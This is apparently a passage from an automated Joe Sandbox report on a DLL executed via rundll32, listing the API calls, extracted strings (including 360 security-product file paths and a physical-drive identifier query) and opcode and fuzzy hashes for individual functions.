                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: MsgCenter$opentime_traystartup
                                                                                    • API String ID: 3702945584-2252518459
                                                                                    • Opcode ID: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                                    • Instruction ID: 822726540527e7bff4823bd2222deb8b26a33040d1884c58a740bbbc5b89d818
                                                                                    • Opcode Fuzzy Hash: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                                    • Instruction Fuzzy Hash: A631C476201B488AEBA18F25D8443D937A4F7487ACF418715EA6C02BE8EF38C258C784
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$LocalSystemsscanf
                                                                                    • String ID: %hu-%hu-%hu %hu:%hu:%hu
                                                                                    • API String ID: 34346384-1004895946
                                                                                    • Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                                    • Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
                                                                                    • Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                                    • Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
                                                                                    • String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
                                                                                    • API String ID: 28297470-3177478685
                                                                                    • Opcode ID: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
                                                                                    • Instruction ID: 8c267d1c97a4f3ae60188c217bf77148b2efdc3265efdf379ec177d08f4db65c
                                                                                    • Opcode Fuzzy Hash: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
                                                                                    • Instruction Fuzzy Hash: 95118F32325A8986EB91DB25E4457DB7360F78C789F805012B68A47955DF3DC609CF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
                                                                                    • String ID: ..\360NetBase64.dll
                                                                                    • API String ID: 2373086246-4183035884
                                                                                    • Opcode ID: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
                                                                                    • Instruction ID: af5cf4f44f90b4c64e773468feb6851d22c47134ddc293a853e7e5ebda926cde
                                                                                    • Opcode Fuzzy Hash: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
                                                                                    • Instruction Fuzzy Hash: 25114C71614A4981FBF3AB60E8953DB23A0FB8D7C9F518115B58D825A5EF28C74DC702
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: wcsncmp$DirectoryPath
                                                                                    • String ID: \\?\
                                                                                    • API String ID: 911398208-4282027825
                                                                                    • Opcode ID: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
                                                                                    • Instruction ID: 9903006c7179f3997e6314bb7e882962eeb1ce79a0b7cc9db4c5bfd4c7dd6eaa
                                                                                    • Opcode Fuzzy Hash: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
                                                                                    • Instruction Fuzzy Hash: E501AD3036568882FBA2EB25EC457E97214BB4CBD0F848235B96A8B1E5DF6CC34DC304
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
                                                                                    • String ID: ..\safemon\FreeSaaS.tpi
                                                                                    • API String ID: 154803636-205188023
                                                                                    • Opcode ID: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
                                                                                    • Instruction ID: d74fc56e569283819db6817bdf86699dd223bda9e6afadc26b68049d38556e4d
                                                                                    • Opcode Fuzzy Hash: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
                                                                                    • Instruction Fuzzy Hash: B5016D35219A8C82FBE2D721EC693D92790B78D388F80D041A4AA077A1DF2DC30DCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
                                                                                    • CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
                                                                                    • String ID: D:P(OA;;FA;;;WD)
                                                                                    • API String ID: 794372803-936388898
                                                                                    • Opcode ID: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
                                                                                    • Instruction ID: 0d5b46b33c23d90729eae48064ade5dfd8da35591b75e80b0d34519ac450dbba
                                                                                    • Opcode Fuzzy Hash: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
                                                                                    • Instruction Fuzzy Hash: 44014B72A14F4486EB518F21F8487A973E0F78CBD4F468221EA5D87714DF38C658C744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                    • _wcsicmp.MSVCRT ref: 000000018002AE4E
                                                                                      • Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromHeapProcessString_wcsicmp
                                                                                    • String ID: $CLSID$ftp:
                                                                                    • API String ID: 2012545421-381575252
                                                                                    • Opcode ID: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
                                                                                    • Instruction ID: d299122ce3e9d517528ccb327dc5a756d1d769515d838a72f3e491c2ced193a8
                                                                                    • Opcode Fuzzy Hash: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
                                                                                    • Instruction Fuzzy Hash: 41F14073301B4886EB52DB29D8407DE7361F789BE9F448311AA6D876E5DF78CA49C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
                                                                                    • String ID:
                                                                                    • API String ID: 1740668140-0
                                                                                    • Opcode ID: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
                                                                                    • Instruction ID: e94a3ea1fea36b0b32ca35adaff13378f84fa0a728ffd439e1abdc7c1a055df0
                                                                                    • Opcode Fuzzy Hash: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
                                                                                    • Instruction Fuzzy Hash: 4D316C32605B4886EB828F15EC543D977A5F79CBE4F59C225EAA9077A5CF3CC249C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsicmp
                                                                                    • String ID: Scriptuser$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
                                                                                    • API String ID: 2081463915-2936173157
                                                                                    • Opcode ID: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
                                                                                    • Instruction ID: 292b1ab8c79ee979d74f734f58635ebd7dc6439912a4449b937fba72fcba6d7c
                                                                                    • Opcode Fuzzy Hash: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
                                                                                    • Instruction Fuzzy Hash: 5B514F72711E4986EB419F79C8807CC2760FB49BF4F449322AA3E936E5DF64C989C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3991485460-0
                                                                                    • Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                                    • Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
                                                                                    • Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                                    • Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??2@Free$??3@Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1832687772-0
                                                                                    • Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                                    • Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
                                                                                    • Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                                    • Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno$freewcstol
                                                                                    • String ID:
                                                                                    • API String ID: 1017142431-0
                                                                                    • Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                                    • Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
                                                                                    • Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                                    • Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno$freewcstol
                                                                                    • String ID:
                                                                                    • API String ID: 1017142431-0
                                                                                    • Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                                    • Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
                                                                                    • Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                                    • Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                                    • Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
                                                                                    • Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                                    • Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
                                                                                      • Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B
                                                                                      • Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363
                                                                                    • memset.MSVCRT ref: 000000018006C2AB
                                                                                      • Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
                                                                                    • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                                    • API String ID: 1541746987-3765948602
                                                                                    • Opcode ID: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
                                                                                    • Instruction ID: 026b1f04e6263926176f9cf333c98f43658e4a5f02bea82afa83b16206533a48
                                                                                    • Opcode Fuzzy Hash: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
                                                                                    • Instruction Fuzzy Hash: D831063220474542FBA29B66AC00BEA7392F789BD4F608121BE5947795DF3CC749CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Delete
                                                                                    • String ID:
                                                                                    • API String ID: 1035893169-0
                                                                                    • Opcode ID: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
                                                                                    • Instruction ID: 40b5deca117a7cefaab46096add2d716b918ff16b730c8479b301d173d09ace7
                                                                                    • Opcode Fuzzy Hash: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
                                                                                    • Instruction Fuzzy Hash: 44219031705E8840FBAADBA2991079D6299BB4EFC0F1DC525FD2A437D4DE38C7488311
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                    • String ID:
                                                                                    • API String ID: 772211780-0
                                                                                    • Opcode ID: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
                                                                                    • Instruction ID: 2d82027f7e94cb9bcb22be17a4537bea80464cdcc919518384ddf93808e552b3
                                                                                    • Opcode Fuzzy Hash: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
